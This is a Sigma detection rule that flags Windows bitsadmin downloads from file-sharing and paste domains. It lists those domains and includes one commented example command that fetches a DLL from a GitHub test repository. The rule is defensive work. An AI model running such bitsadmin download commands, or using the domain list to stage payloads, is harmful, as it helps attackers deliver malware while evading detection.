Suspicious Download From File-Sharing Website Via Bitsadmin
Detects usage of bitsadmin downloading a file from a suspicious domain
Sigma rule (View on GitHub)
1title: Suspicious Download From File-Sharing Website Via Bitsadmin
2id: 8518ed3d-f7c9-4601-a26c-f361a4256a0c
3related:
4 - id: 8b48ad89-10d8-4382-a546-50588c410f0d
5 type: similar
6 - id: d635249d-86b5-4dad-a8c7-d7272b788586
7 type: similar
8 - id: 52182dfb-afb7-41db-b4bc-5336cb29b464
9 type: similar
10 - id: ae02ed70-11aa-4a22-b397-c0d0e8f6ea99
11 type: similar
12 - id: e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97
13 type: similar
14 - id: 7b434893-c57d-4f41-908d-6a17bf1ae98f
15 type: similar
16 - id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794
17 type: similar
18 - id: 56454143-524f-49fb-b1c6-3fb8b1ad41fb
19 type: similar
20 - id: b6e04788-29e1-4557-bb14-77f761848ab8
21 type: similar
22 - id: a0d7e4d2-bede-4141-8896-bc6e237e977c
23 type: similar
24 - id: 297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7
25 type: similar
26status: test
27description: Detects usage of bitsadmin downloading a file from a suspicious domain
28references:
29 - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin
30 - https://isc.sans.edu/diary/22264
31 - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
32 - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker
33 - https://www.cisa.gov/uscert/ncas/alerts/aa22-321a
34 - https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/
35author: Florian Roth (Nextron Systems)
36date: 2022-06-28
37modified: 2026-03-29
38tags:
39 - attack.persistence
40 - attack.execution
41 - attack.stealth
42 - attack.t1197
43 - attack.s0190
44 - attack.t1036.003
45 - attack.command-and-control
46 - attack.t1105
47logsource:
48 category: process_creation
49 product: windows
50detection:
51 selection_img:
52 - Image|endswith: '\bitsadmin.exe'
53 - OriginalFileName: 'bitsadmin.exe'
54 selection_flags:
55 CommandLine|contains:
56 - ' /transfer '
57 - ' /create '
58 - ' /addfile '
59 selection_domain:
60 CommandLine|contains:
61 - '.githubusercontent.com' # Includes both gists and github repositories / Michael Haag (idea)
62 - '0x0.st'
63 - 'anonfiles.com'
64 - 'bashupload.com'
65 - 'cdn.discordapp.com'
66 - 'chunk.io'
67 - 'ddns.net'
68 - 'dl.dropboxusercontent.com'
69 - 'ghostbin.co'
70 - 'github.com' # bitsadmin /transfer n https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll %PUBLIC%\calc.dll
71 - 'glitch.me'
72 - 'gofile.io'
73 - 'hastebin.com'
74 - 'mediafire.com'
75 - 'mega.nz'
76 - 'onrender.com'
77 - 'pages.dev'
78 - 'paste.ee'
79 - 'pastebin.com'
80 - 'pastebin.pl'
81 - 'pastetext.net'
82 - 'privatlab.com'
83 - 'privatlab.net'
84 - 'send.exploit.in'
85 - 'sendspace.com'
86 - 'storage.googleapis.com'
87 - 'storjshare.io'
88 - 'supabase.co'
89 - 'temp.sh'
90 - 'transfer.sh'
91 - 'trycloudflare.com'
92 - 'ufile.io'
93 - 'w3spaces.com'
94 - 'workers.dev'
95 - 'x0.at'
96 condition: all of selection_*
97falsepositives:
98 - Some legitimate apps use this, but limited.
99level: high
100regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains/info.yml
101simulation:
102 - type: atomic-red-team
103 name: Windows - BITSAdmin BITS Download
104 technique: T1105
105 atomic_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b
References
Related rules
- File Download Via Bitsadmin
- File Download Via Bitsadmin To A Suspicious Target Folder
- File With Suspicious Extension Downloaded Via Bitsadmin
- Bitsadmin to Uncommon IP Server Address
- Bitsadmin to Uncommon TLD